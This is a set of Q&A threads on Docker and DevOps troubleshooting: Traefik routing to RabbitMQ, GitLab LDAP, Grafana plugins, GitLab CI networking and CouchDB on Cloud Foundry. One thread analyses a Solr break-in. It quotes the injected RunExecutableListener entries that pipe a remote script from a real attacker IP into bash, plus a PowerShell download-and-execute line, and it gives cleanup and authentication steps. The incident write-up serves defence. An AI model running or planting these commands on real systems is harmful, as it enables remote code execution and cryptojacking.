Cannot access RabbitMQ UI on docker container - azure

I'm currently working on a project where I have a virtual machine on Microsoft Azure, and I'm trying to make multiple Docker containers accessible through different routes with the help of a Traefik reverse proxy. Besides the reverse proxy, the first service I need is RabbitMQ, and I should be able to access its user interface on a /rmq route. Right now, I have the following docker-compose file to build both services:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
And this is the content of my traefik.toml file:
logLevel = "DEBUG"
debug = true
[api]
dashboard = true
insecure = false
debug = true
[providers.docker]
endpoint = "unix:///var/run/docker.sock"
watch = true
[entryPoints]
[entryPoints.web]
address = ":80"
[entryPoints.web-secure]
address = ":443"
[log]
level = "DEBUG"
format = "json"
The enabled_plugins file specifies which RabbitMQ plugins should be activated. Here, I have the rabbitmq_management plugin (among others), which I think is needed to access the RabbitMQ UI. I even checked the logs of the RabbitMQ container and apparently the rabbitmq_management was properly started:
rabbitmq_1 | 2021-01-30 15:50:30.538 [info] <0.730.0> Server startup complete; 7 plugins started.
rabbitmq_1 | * rabbitmq_stomp
rabbitmq_1 | * rabbitmq_federation_management
rabbitmq_1 | * rabbitmq_mqtt
rabbitmq_1 | * rabbitmq_federation
rabbitmq_1 | * rabbitmq_management
rabbitmq_1 | * rabbitmq_web_dispatch
rabbitmq_1 | * rabbitmq_management_agent
rabbitmq_1 | completed with 7 plugins.
rabbitmq_1 | 2021-01-30 15:50:30.539 [info] <0.730.0> Resetting node maintenance status
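(For reference, the enabled_plugins file is a single Erlang term: a list of plugin names terminated by a period. A minimal sketch matching the plugins named in the log above might look like the line below; the exact list is an assumption, since dependencies such as rabbitmq_web_dispatch and rabbitmq_management_agent are pulled in automatically.)
[rabbitmq_management,rabbitmq_federation,rabbitmq_federation_management,rabbitmq_mqtt,rabbitmq_stomp].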
With these configurations running under docker-compose up, if I try to access HOST.com/rmq, I get a 502 (Bad Gateway) error in my browser's console, and initially this was where I was stuck. However, after searching for help online, I found a different way to specify the Traefik port in the RabbitMQ container labels (traefik.http.services.rabbitmq.loadbalancer.server.port=15672). With this modification I no longer get the Bad Gateway error, but I do get a lot of ERR_ABORTED 404 (Not Found) errors in the browser console (the list below does not contain all of them):
rmq:7 GET http://HOST.com/js/ejs-1.0.min.js net::ERR_ABORTED 404 (Not Found)
rmq:18 GET http://HOST.com/js/charts.js net::ERR_ABORTED 404 (Not Found)
rmq:19 GET http://HOST.com/js/singular/singular.js net::ERR_ABORTED 404 (Not Found)
Refused to apply style from 'http://HOST.com/css/main.css' because its MIME type ('text/plain') is not a supported stylesheet MIME type, and strict MIME checking is enabled.
rmq:27 Uncaught ReferenceError: sync_get is not defined at rmq:27
I don't have much experience with this kind of project, and I don't know whether I'm doing something wrong or whether something is missing in these configurations or in the configuration of the virtual machine itself. Do you know what I should do to be able to access the RabbitMQ UI at the URL HOST.com/rmq?
If I get this running properly, I think I would also be able to configure Docker to only allow access to the Traefik UI via a route such as HOST.com/dashboard, instead of accessing it only at the bare URL without any route.
Thanks in advance!

Solved it. I don't know why, but when I switched to the configuration traefik.http.services.rabbitmq.loadbalancer.server.port=15672, I had also swapped the order of the lines traefik.http.routers.rabbitmq.middlewares=strip-docs and traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq, so that the prefix definition appeared before the middleware assignment. After putting them back in the original order, I can now access the RabbitMQ UI at HOST.com/rmq. So my final docker-compose file is this:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.http.services.rabbitmq.loadbalancer.server.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
I'll mark this question as solved, but if you know why the order of these 2 lines matters, please explain for future reference.
Thanks!

Trace of how I determined an answer to suggest for this question, given that I haven't used the specific tools:
By searching for rabbitmq admin url, I found the rabbitmq management docs page, which, near the top, mentions support for a path prefix setting. I searched the page for that and, under the relevant heading, found that you will likely need to set this in your rabbitmq config:
management.path_prefix = /rmq
So, to apply it to your docker config, I looked up the rabbitmq docker image, which discusses that configuration files need to be injected via a bind mount, or can be provided via an esoteric erlang config thing which I'd personally not mess with. Therefore, the steps I'd follow from here would be:
Look in the existing rabbitmq image to find out what the default config file in /etc/rabbitmq/rabbitmq.conf is, e.g. by running docker-compose run rabbitmq cat /etc/rabbitmq/rabbitmq.conf, or with an appropriate docker cp command if it turns out rabbitmq sets a docker ENTRYPOINT that prevents running shell commands on the image command line.
Add a volume just like the one you have for enabled_plugins, but move it one directory upward, mapping rabbit/ to /etc/rabbitmq/, and put the default config from the container into rabbit/.
Add the management.path_prefix line to that config file; a sketch of how this might end up looking is below.
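A rough sketch under those assumptions (the file name rabbitmq.conf and the host directory rabbit/ simply follow the steps above; keep whatever defaults you copied out of the image and just append the prefix line):
# rabbit/rabbitmq.conf -- copied defaults plus the management prefix
management.path_prefix = /rmq
and in docker-compose.yml the rabbitmq volume mapping would widen to the whole directory:
    volumes:
      - ./rabbit/:/etc/rabbitmq/   # now provides both enabled_plugins and rabbitmq.conf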
With any luck that should at least get you closer. I'm curious to hear how it goes!
By the way, while looking at the rabbitmq docker image docs, I discovered that there are special tags for when you need management interface support. You may find that you need to switch to one of those instead of plain 3-alpine for this to work, e.g. rabbitmq:3-management-alpine.
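If so, that would be a one-line change in the compose file (sketch; 3-management-alpine is the management-enabled counterpart of the tag used above):
  rabbitmq:
    image: rabbitmq:3-management-alpine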

Related

GitLab - LDAP Authentication Issue

I am sorry if this issue has already been resolved, but I could not find any related answers.
I am trying to set up a self-hosted gitlab instance through docker-compose, which I wish to connect to an LDAP server.
(I have connected other applications to the same LDAP server in the past without issues, and also the account I am trying to login to is that of a valid user.)
However, no matter what I've tried I keep receiving this error upon login: Could not authenticate you from Ldapmain because "Invalid filter syntax.".
My current docker-compose file is as follows:
version: '3.7'
services:
  web:
    image: 'gitlab/gitlab-ee:14.8.6-ee.0'
    restart: on-failure
    hostname: 'host.namespace.com'
    container_name: gitlab-ee
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://host.namespace.com'
        gitlab_rails['ldap_enabled'] = true
        gitlab_rails['ldap_host'] = 'ldap://something.something.com'
        gitlab_rails['ldap_port'] = 389
        gitlab_rails['ldap_base'] = 'ou=people,dc=namespace,dc=com'
        gitlab_rails['ldap_uid'] = 'uid'
    ports:
      - '80:80'
      - '443:443'
      - '22:22'
    volumes:
      - '/srv/gitlab/config:/etc/gitlab'
      - '/srv/gitlab/logs:/var/log/gitlab'
      - '/srv/gitlab/data:/var/opt/gitlab'
As you can see, in my current configuration I did not set ldap_user_filter at all, since it is not listed as required: https://docs.gitlab.com/ee/administration/auth/ldap/#basic-configuration-settings.
However, I have also tried setting gitlab_rails['ldap_user_filter'] = '' or gitlab_rails['ldap_user_filter'] = '(&(objectClass=zimbraAccount)(uid={login}))' without any luck. Setting gitlab_rails['bind_dn'] and other attributes did not help either. I keep receiving the same "Invalid filter syntax." error over and over again.
Could you please point me to the right direction?
Thank you in advance!
FIXED. The problem was the scheme prefix in the ldap_host value. I changed:
gitlab_rails['ldap_host'] = 'ldap://something.something.com'
to:
gitlab_rails['ldap_host'] = 'something.something.com'
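For completeness, this is how the corrected setting fits into the GITLAB_OMNIBUS_CONFIG block from the compose file above (only that block shown; everything else stays the same):
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://host.namespace.com'
        gitlab_rails['ldap_enabled'] = true
        gitlab_rails['ldap_host'] = 'something.something.com'   # hostname only, no ldap:// scheme
        gitlab_rails['ldap_port'] = 389
        gitlab_rails['ldap_base'] = 'ou=people,dc=namespace,dc=com'
        gitlab_rails['ldap_uid'] = 'uid'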

Installing a custom grafana datasource through helm / terraform

I would like to install the Alertmanager datasource (https://grafana.com/grafana/plugins/camptocamp-prometheus-alertmanager-datasource/) into my kube-prometheus-stack installation, which is built using Terraform and the Helm provider. I cannot work out how to get the plugin files onto the node running Grafana, though.
Using a modified values.yaml and feeding it to helm with -f values.yaml (please ignore the values):
additionalDataSources:
  - name: Alertmanager
    editable: false
    type: camptocamp-prometheus-alertmanager-datasource
    url: http://localhost:9093
    version: 1
    access: default
    # optionally
    basicAuth: false
    basicAuthUser:
    basicAuthPassword:
I can see the datasource in grafana but the plugin files do not exist.
Alertmanager visible in list of datasources
However, clicking on the datasource I see
Plugin not found, no installed plugin with that ID
Please note that the Grafana pod also seems to require a restart to pick up datasource changes, which I would consider needs fixing at a higher level.
It's actually quite simple to get the files there, and I cannot believe I overlooked such a simple solution. Posting this here in the hope others find it useful.
In the kube-prometheus-stack, values.yaml file, just override the grafana section as follows:
grafana:
  # ...
  plugins:
    - camptocamp-prometheus-alertmanager-datasource
    - grafana-googlesheets-datasource
    - doitintl-bigquery-datasource
    - redis-datasource
    - xginn8-pagerduty-datasource
    - marcusolsson-json-datasource
    - grafana-kubernetes-app
    - yesoreyeram-boomtable-panel
    - savantly-heatmap-panel
    - bessler-pictureit-panel
    - grafana-polystat-panel
    - dalvany-image-panel
    - michaeldmoore-multistat-panel
  additionalDataSources:
    - name: Alertmanager
      editable: false
      type: camptocamp-prometheus-alertmanager-datasource
      url: http://prometheus-kube-prometheus-alertmanager.monitoring:9093
      version: 1
      access: default
      # optionally
      basicAuth: false
      basicAuthUser:
      basicAuthPassword:
where the name / type of the plugin can be found in the installation instructions on the Grafana Plugins page.
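Since the stack here is built with Terraform and the Helm provider, a minimal sketch of feeding that overridden values.yaml to the chart could look like this (the resource and release names are assumptions; the repository and chart names are the usual ones for kube-prometheus-stack):
resource "helm_release" "kube_prometheus_stack" {
  name       = "prometheus"   # assumed release name
  repository = "https://prometheus-community.github.io/helm-charts"
  chart      = "kube-prometheus-stack"
  namespace  = "monitoring"

  # values.yaml contains the grafana.plugins and grafana.additionalDataSources overrides shown above
  values = [file("${path.module}/values.yaml")]
}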
I made some progress by discovering I could get onto the pod running grafana using:
kubectl exec -it --container grafana prometheus-grafana-5d844b67c6-5p46b -- /bin/sh
The one listed in kubectl get pods was the sidecar.
Then I could run:
kubectl exec -it --container grafana prometheus-grafana-5d844b67c6-5p46b -- grafana-cli plugins install camptocamp-prometheus-alertmanager-datasource
which installed the required files. After deleting and recreating the pod, there was progress.
Keen to hear any comments on the approach or better ideas!

Services in Gitlab-ci start with error "host type networking can't be used with links"

I have a couple of services in my .gitlab-ci.yml that I need to start in order to run some tests.
services:
  - name: bitnami/rabbitmq:3.8.9
    alias: rabbitmq
  - name: postgres:latest
    alias: postgres
  - name: milvusdb/milvus:cpu-latest
    alias: milvus
When the pipeline runs, I get the following errors about "host type networking can't be used with links", and then my tests are unable to connect to these services. Any ideas?
Starting service bitnami/rabbitmq:3.8.9 ...
Pulling docker image bitnami/rabbitmq:3.8.9 ...
Using docker image sha256:05842c6800e806410cf801b2953405471944e371d3891c99c5c85b1d65213081 for bitnami/rabbitmq:3.8.9 with digest bitnami/rabbitmq@sha256:e11436ff83c3ede1aeb909fa398fb93990b00f66d8f8ee789334799546551429 ...
Starting service postgres:latest ...
Pulling docker image postgres:latest ...
Using docker image sha256:88590756b1243dbb10fdf02ffc837cd6cbc5a98b8b7aca90dc42172bd35d2ab4 for postgres:latest with digest postgres@sha256:b25265ac1dfa19224fd47dd9f5744aa177248fd64e89f407446559cc7dbc7a23 ...
WARNING: Service postgres:latest is already created. Ignoring.
Starting service milvusdb/milvus:cpu-latest ...
Pulling docker image milvusdb/milvus:cpu-latest ...
Using docker image sha256:de52c89600581e203bc83f0dd984133da75fedbcb254c45cee746695f4f8d1ef for milvusdb/milvus:cpu-latest with digest milvusdb/milvus@sha256:0f2609e575edeea8cafa8525ac8a94ed1da7f3048f938cafa8832be60fbbc25d ...
Waiting for services to be up and running...
*** WARNING: Service runner-rugbzglx-project-101-concurrent-0-65c54561e0ef98bc-milvusdb__milvus-2 probably didn't start properly.
Health check error:
create service container: Error response from daemon: conflicting options: host type networking can't be used with links. This would result in undefined behavior (docker.go:1230:0s)
Service container logs:
*********
*** WARNING: Service runner-rugbzglx-project-101-concurrent-0-65c54561e0ef98bc-bitnami__rabbitmq-0 probably didn't start properly.
Health check error:
create service container: Error response from daemon: conflicting options: host type networking can't be used with links. This would result in undefined behavior (docker.go:1230:0s)
Service container logs:
2021-04-01T16:32:59.685554437Z rabbitmq 16:32:59.68
2021-04-01T16:32:59.688810064Z rabbitmq 16:32:59.68 Welcome to the Bitnami rabbitmq container
2021-04-01T16:32:59.692027343Z rabbitmq 16:32:59.69 Subscribe to project updates by watching https://github.com/bitnami/bitnami-docker-rabbitmq
2021-04-01T16:32:59.695625938Z rabbitmq 16:32:59.69 Submit issues and feature requests at https://github.com/bitnami/bitnami-docker-rabbitmq/issues
2021-04-01T16:32:59.699195720Z rabbitmq 16:32:59.69
2021-04-01T16:32:59.703053245Z rabbitmq 16:32:59.70 INFO ==> ** Starting RabbitMQ setup **
2021-04-01T16:32:59.734132004Z rabbitmq 16:32:59.73 INFO ==> Validating settings in RABBITMQ_* env vars..
2021-04-01T16:32:59.768512663Z rabbitmq 16:32:59.76 INFO ==> Initializing RabbitMQ...
2021-04-01T16:32:59.791219983Z rabbitmq 16:32:59.78 INFO ==> Generating random cookie
2021-04-01T16:32:59.831062410Z rabbitmq 16:32:59.83 INFO ==> Starting RabbitMQ in background...
*********
*** WARNING: Service runner-rugbzglx-project-101-concurrent-0-65c54561e0ef98bc-postgres-1 probably didn't start properly.
Health check error:
create service container: Error response from daemon: conflicting options: host type networking can't be used with links. This would result in undefined behavior (docker.go:1230:0s)
Service container logs:
2021-04-01T16:33:01.060049843Z Error: Database is uninitialized and superuser password is not specified.
2021-04-01T16:33:01.060137811Z You must specify POSTGRES_PASSWORD to a non-empty value for the
2021-04-01T16:33:01.060150522Z superuser. For example, "-e POSTGRES_PASSWORD=password" on "docker run".
2021-04-01T16:33:01.060158849Z
2021-04-01T16:33:01.060165847Z You may also use "POSTGRES_HOST_AUTH_METHOD=trust" to allow all
2021-04-01T16:33:01.060195247Z connections without a password. This is *not* recommended.
2021-04-01T16:33:01.060202850Z
2021-04-01T16:33:01.060209698Z See PostgreSQL documentation about "trust":
2021-04-01T16:33:01.060217076Z https://www.postgresql.org/docs/current/auth-trust.html
*********
The solution is to change network_mode in the runner's config.toml configuration file. The setting that causes the conflict looks like this:
[[runners]]
  name = "myrunner"
  [runners.docker]
    network_mode = "host"
You can delete the network_mode = "host" line, and Docker will then use bridge mode by default.
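As a rough sketch of applying that on a Linux-installed runner (the config path below is the usual default, so treat it as an assumption for your setup):
sudo nano /etc/gitlab-runner/config.toml   # delete the network_mode = "host" line
sudo gitlab-runner restart                 # pick up the new configuration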

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop showed that all cores were loaded at 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; however, UID 8983 pointed to the Solr container as the source of the problem.
I tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 available on Docker Hub, https://hub.docker.com/_/solr/), since the site had to keep working.
In the Docker logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
    "exe":"sh",
    "name":"newlistener-02",
    "args":[
      "-c",
      "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
    "event":"newSearcher",
    "class":"solr.RunExecutableListener",
    "dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code that installs a crypto miner (the crypto miner config is at http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we only need the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings in this file can also be seen at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove the file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop it is described at https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container; a sketch of both options follows.
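For example (the container name is an assumption here; it matches the container_name used in the compose file further down, and the bin/solr commands apply when Solr runs directly on the host):
# if Solr runs in Docker, restarting the container is enough
docker restart solr-container
# if Solr runs directly on the host
bin/solr stop -all
bin/solr start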
As I understand it, this attack was possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
...and was fixed in v5.5.5, 6.6.2+ and 7.1+.
The attack also relied on http://example.com:8983 being freely accessible to anyone, so even though the exploit itself is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
  "authentication":{
    "blockUnknown": true,
    "class":"solr.BasicAuthPlugin",
    "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
  },
  "authorization":{
    "class":"solr.RuleBasedAuthorizationPlugin",
    "permissions":[{"name":"security-edit",
      "role":"admin"}],
    "user-role":{"solr":"admin"}
  }
}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr uses its own hash scheme (a sha256(password+salt) hash), a typical password hash generator cannot be used here. The easiest way I've found to generate the hash is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just the Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to web interface from host to container, i.e. 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
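With that in place, rebuilding the image and recreating the container should be enough to pick up security.json, for example:
docker-compose up -d --build solr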

CouchDB in CloudFoundry?

I'm reviewing the Cloud Foundry project and trying to install it on a server.
I will use CouchDB as a database service.
My main question is: how do I use CouchDB in Cloud Foundry?
I installed a CF instance with: vcap_dev_setup -c devbox_all.yml -D mydomain.com
The devbox.yml contains:
install:
  - all
With this install, the couchdb_node and the couchdb_gateway are present by default.
But it seems to be buggy in general.
For example, when I delete an app I get this error:
$ vmc delete notes2
Provisioned service [mongodb-d216a] detected, would you like to delete it? [yN]: y
Provisioned service [redis-8fcdc] detected, would you like to delete it? [yN]: y
Deleting application [notes2]: OK
Deleting service [mongodb-d216a]: Error 503: Unexpected response from service gateway
So I tried to install a CF instance with this config (a standard single node with Redis, CouchDB and MongoDB).
conf.yml:
jobs:
  install:
    - nats_server
    - router
    - stager
    - ccdb
    - cloud_controller:
        builtin_services:
          - redis
          - mongodb
          - couchdb
    - health_manager
    - dea
    - uaa
    - uaadb
    - redis_node:
        index: "0"
    - couchdb_node:
        index: "0"
    - mongodb_node:
        index: "0"
    - coudb_gateway
    - redis_gateway
    - mongodb_gateway
First, this config doesn't work, because 'couchdb' is not a valid keyword in the builtin_services part.
So, what am I doing wrong?
Is the CouchDB integration still in progress and simply not finished yet?
Next, I did manage to install the CF instance without the couchdb builtin_services option, but with a couchdb_node and a couchdb_gateway, and they start.
I suppose the service is runnable.
But I can't use 'couchdb' in my app's manifest.yml or choose this service to bind to.
(That seems normal, because it is not installed as a service.)
So it seems to be close to working, but it's not.
I'd welcome any ideas or advice on this subject, because I couldn't find people talking about it around the web.
Thanks for reading.
Lucas
I decided to try this myself and it appears to work OK. I created a new VCAP instance with vcap_dev_setup and the following configuration:
---
deployment:
  name: "cloudfoundry"
jobs:
  install:
    - nats_server
    - cloud_controller:
        builtin_services:
          - mysql
          - postgresql
          - couchdb
    - stager
    - router
    - health_manager
    - uaa
    - uaadb
    - ccdb
    - dea
    - couchdb_gateway
    - couchdb_node:
        index: "0"
    - postgresql_gateway
    - postgresql_node:
        index: "0"
    - mysql_gateway
    - mysql_node:
        index: "0"
I was able to bind instances of CouchDB to a node app and read the service info from VCAP_SERVICES, as below:
'{"couchdb-1.2":[{"name":"couchdb-c7eb","label":"couchdb-1.2","plan":"free","tags":["key-value","cache","couchdb-1.2","couchdb"],"credentials":{"hostname":"127.0.0.1","host":"127.0.0.1","port":5984,"username":"7f3c0567-89cc-4240-b249-40d1f4586035","password":"8fef9e88-3df2-46a8-a22c-db02b2917251","name":"dde98c69f-01e9-4e97-b0d6-43bed946da95"}}]}'
I was also able to tunnel the service to a local port and connect to it (screenshot omitted).
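For reference, the tunnelling step would presumably be done with the vmc tunnel command against the service instance name from the VCAP_SERVICES output above (a sketch, not verified on this exact setup):
vmc tunnel couchdb-c7eb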
What version of Ubuntu have you used to install VCAP?
